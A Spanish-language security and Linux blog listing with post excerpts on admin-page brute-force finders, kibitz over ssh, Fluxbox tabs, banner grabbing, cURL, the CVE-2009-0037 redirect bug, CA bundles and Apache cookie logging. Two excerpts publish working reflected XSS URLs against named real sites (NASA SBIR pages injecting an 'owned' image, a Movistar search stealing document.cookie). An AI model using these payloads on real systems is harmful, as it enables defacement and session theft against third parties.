Scripts escritos en Python y Perl para realizar ataques de fuerza bruta con el objetivo de averiguar las URL de acceso al panel de administración de un determinado sitio web (Admin Page Finder).

Servicios en Linea: http://mormoroth.net/af/ || http://4dm1n.houbysoft.com/ (Código fuente disponible)

Leer más »

Kibitz en un script para Linux/BSD/ Unix que permite compartir una terminal del sistema con varios usuarios (locales o remotos), creado por Don Libes en 1994 en el lenguaje de programación expect (Tcl). Dicho Script permite usar una misma shell o cualquier programa que funcione en modo texto entre varios usuarios del sistema, pudiendo interactuar todos con ella al mismo tiempo. Puede ser usado por los usuarios de forma local o bien en remoto pudiendo lanzar una shell remota a otro host por medio del protocolo rlogin.

Como actualmente rlogin se considera inseguro y hace tiempo que su uso fue sustituido por ssh (Secure SHell), hemos realizado un pequeño "hack" sobre kibitz para que utilice el protocolo ssh en vez de rlogin, con las ventajas en seguridad que eso implica. Este script es muy útil para realizar funciones formativas, ya que permite a un usuario poder enseñar todo lo que sucede en su consola a varias personas simultáneamente y en tiempo real. También es útil para solicitar ayuda ofreciendo nuestra propia shell a una persona que pueda utilizarla para ayudarnos remotamente con algún problema mientras supervisamos sus acciones, se le puede sacar tanto partido como aplicaciones modo texto tengamos.

Como dependencias debemos tener instalado "Expect", que suele estar en los repositorios de casi todas las distribuciones GNU/Linux. En algunas distros como Slackware viene de serie, tanto Expect como el script kibitz, el cual debemos sustituir por el que proponemos en este articulo para poder utilizar ssh en vez del desfasado rlogin.

Leer más »

Dominios: sbir.gsfc.nasa.gov || sbir.nasa.gov || sbir.hq.nasa.gov
/sbirweb/search/stateSearch.jsp?st=%22%3E%3CIMG%20SRC=http://www.busindre.com/archivos/owned2.jpg%3E%3C!--
/sbirweb/search/firmSearch.jsp?firm_id=%22%3E%3CIMG%20SRC=http://www.busindre.com/archivos/owned2.jpg%3E%3C!--
/sbirweb/search/searchResults.jsp?st=%3Cimg%20src=http://www.busindre.com/archivos/owned2.jpg%3E

Fluxbox es un popular gestor de ventanas basado en Blackbox para el Sistema gráfico X Window, es muy ligero, fácil de manejar y altamente personalizable. Uno de sus puntos fuertes que curiosamente desconoce gran parte de sus usuarios, es la posibilidad de agrupar varias aplicaciones (ventanas) en una y movernos entre ellas a través de pestañas (tabs). Esta característica está siendo adoptada por más de un escritorio en la actualidad debido a que facilita en gran medida la gestión y uso de múltiples aplicaciones en pantalla. Los usos que se le pueden dar son muy variados, por ejemplo con esta característica se podría tener en una ventana todas las aplicaciones de mensajería que estemos usando (Xchat, Amsn, Skype, Jabber,..), mientras que en otra tenemos los navegadores Firefox, Konqueror y Opera junto a Gftp para subir documentos web a un servidor y poder visualizarlos posteriormente con los navegadores.

Para unir múltiples aplicaciones en una sola ventana, debemos seleccionar la aplicación con el botón central del ratón sobre la barra de título y desplazarla dentro de la ventana que nos interese para que se fusionen. En la barra de herramientas de Fluxbox siempre encontraremos el icono de la aplicación que se tenga en primer plano. Si por ejemplo uniéramos las ventanas de Amsn y Xchat, quedando esta última en primer plano, si algún contacto de msn nos abriera conversación, el icono de Xchat de la barra de herramientas se iluminará, por lo que recibiríamos la notificación aunque la pestaña de Amsn no estuviera en primer plano. Para sacar una ventana de un conjunto vale con posicionarse sobre la pestaña, pulsar el botón de en medio del ratón y dirigirla hacia el escritorio.

Leer más »

Vector Cross-site scripting: [[Link / Imagen]]
https://emocion.movistar.es/emocionweb/search.jsp?search=%3Cscript%3Ealert%28document.cookie)%3C/script%3E

Banner grabbing es una de la técnicas más antiguas y simples para obtener información de un determinado servicio que corra en Internet, se basa en obtener información (Software en uso y versión del mismo) por medio de solicitudes al servidor. Como sabemos los banners mostrados por las diversas aplicaciones servidor (SMTP, Apache, Ftp,...) son fácilmente modificables por cualquier administrador que se precie, por lo que aunque no sea común encontrar banners falseados en la mayoría de sitios, no es una técnica fiable al 100%.

Para obtener el banner de una determinada aplicación suele bastar con establecer un socket contra el puerto donde está corriendo, esto se puede hacer con aplicaciones típicas como netcat o el mismo telnet, en otro tipo de protocolos es posible que se necesite interactuar con el servicio para obtener la información que nos interese. Para facilitar estas labores de Banner grabbing en sistemas GNU/Linux tenemos "Banner Grab".

Descargar Banner Grab: http://sourceforge.net/projects/bannergrab

Compilar / Instalar Banner Grab

$ tar -zxvf bannergrab-3.5.tgz
$ cd bannergrab-3.5
$ make
# make install o # checkinstall

Leer más »

cURL es una conocida herramienta modo texto para transferir archivos con sintaxis URL, soporta los protocolos FTP, FTPS, HTTP, HTTPS, TFTP, SCP, SFTP, Telnet, DICT, FILE y LDAP. También permite trabajar con certificados HTTPS, HTTP POST, HTTP PUT, subidas FTP, Kerberos, formularios HTTP, proxies, cookies, autenticación mediante usuario+contraseña (Basic, DIgest, NTLM y Negotiate para HTTP y kerberos4 para FTP), continuación de transferencia de archivos, tunneling de proxy http y muchas otras prestaciones que hacen de cURL una herramienta verdaderamente interesante y de obligado conocimiento.

Su principal propósito es el de automatizar transferencias de archivos o secuencias de operaciones no supervisadas gracias a que permite simular casi todas las acciones que un usuario puede desempeñar con un navegador web. cURL puede ser usado para un sin fin de propósitos, por ejemplo la realización de spam en comentarios de páginas web, realizar pruebas de Cross-site scripting e inyecciones Sql mediante HTTP POST, automatizar descargas o subidas de datos en cualquiera de sus protocolos soportados, escribir entradas en blogs como Wordpress, descargar correos desde algún webmail (Gmail, Yahoo,...) con un solo comando, etc...

En este manual nos centraremos en el uso del comando cURL explicando casi todas sus opciones, la biblioteca Libcurl es multiplataforma y está implementada en más de 30 lenguajes de programación distintos, por lo que puede ser utilizada en un sin fin de escenarios diferentes (Páginas web, gestores de descarga, scripts, malware, aplicaciones de backups, etc...).

Leer más »

Las versiones de Curl comprendidas entre la 5.11 y 7.19.3 ambas incluidas, están afectadas por un problema de seguridad que permite ejecutar determinados comandos curl en el cliente utilizando la redirección HTTP (CVE-2009-0037). El problema de esas versiones afectadas recae en que cuando curl visita un documento web y este le redirecciona a una nueva URL, curl no analiza dicha dirección pudiéndole indicar que realice cualquier petición del tipo ftp, ftps, tftp, file:/// y scp.

Las posibilidades de explotación lógicamente son muy limitadas, pero el bug puede ser aprovechado dependiendo de los escenarios donde estemos trabajando. Imaginemos un portal web como puede ser zone-h.org, encargado de realizar backups de los miles de defaces que se realizan a diario en Internet. Este tipo de portales suelen usar libcurl para realizar estas copias de seguridad por lo que dependiendo de como implementasen podrían verse afectados por esta vulnerabilidad. Supongamos que una vez se envía el formulario para registrar un deface (Un simple fichero index.php), la aplicación por debajo ejecutase este comando:

La URL del deface es: http://XXXXX/index.php
curl -L http://XXXXX/index.php > backup_001.html

NOTA: La opción -L de curl indica que debe realizar la redirección.

Leer más »

Cuando encontramos instalada una determinada autoridad certificadora (CA) en el repositorio de CAs de confianza del navegador, cualquier certificado firmado por dicha CA se podrá validar de forma transparente al usuario, ya que se dispone de la clave pública con la que verificar la firma que lleva el certificado que nos muestra un determinado sitio web. Al haber muchas autoridades de certificación en el mercado, los navegadores traen instalada por defecto una lista de certificados raíz (Certificados CA) que sirve para comprobar de forma automática la validez del certificado y de esta forma facilitarle la vida al usuario.

Debido a que no hay unanimidad en los estándares de los formatos a utilizar, dependiendo del programa que usemos podemos encontrar los certificados en distintos formatos. Por ejemplo la lista de certificados CA de Firefox no incluye los certificados en formato PEM, que es el formato usado por defecto en SSL, por lo que si queremos utilizar estos certificados raíz con otro tipo de aplicaciones que utilicen otro formato debemos transformarlo primero.

El script en perl mk-ca-bundle.pl nos facilita la labor de convertir todos los certificados CA de Mozilla/Firefox a formato PEM de una forma rápida y cómoda. El script descarga la lista de certificados CA de Mozilla en un fichero (certdata.txt) para luego extraer en formato PEM todos los certificados en un archivo "ca-bundle.crt", compatible al 100% con la librería LibCurl y otro tipo de aplicaciones.

Descargar mk-ca-bundle.pl: Mk-ca-bundle.pl

Forma de uso:
$ perl mk-ca-bundle.pl
Downloading 'certdata.txt' ...
Processing 'certdata.txt' ...
Done (126 CA certs processed)

Leer más »

En muchos casos es útil tener el registro de cookies de usuario en los logs de nuestro servidor web. Los motivos para almacenar este tipo de información suelen estar relacionado con la seguridad, varios tests de penetración pueden usar cookies para localizar comportamientos anómalos, como puede ser el robo de sesiones de usuario o cookies con código malicioso como valor (Xss). También es útil para distinguir unos usuarios de otros cuando estos comparten una misma dirección IP, ya sea para realizar un seguimiento o bien para fines estadísticos. Lógicamente el registrar todas las cookies supone una mayor carga en el servidor web y en muy pocos casos se recomienda su uso por ese mismo motivo.

En Apache la ubicación del fichero log y el contenido que registra se puede configurar con la directiva "CustomLog" y "LogFormat", la primera se encarga de indicar la ubicación del fichero de logs mientras que "LogFormat" especifica qué información almacenamos en esos registros. Todo lo que ahora centralizan estas dos opciones, en versiones antiguas del servidor Apache se usaban otros módulos y directivas para controlar la información que se almacena en el registro de acceso, como eran "mod_log_referer", "mod_log_agent", y la directiva "TransferLog".

Leer más »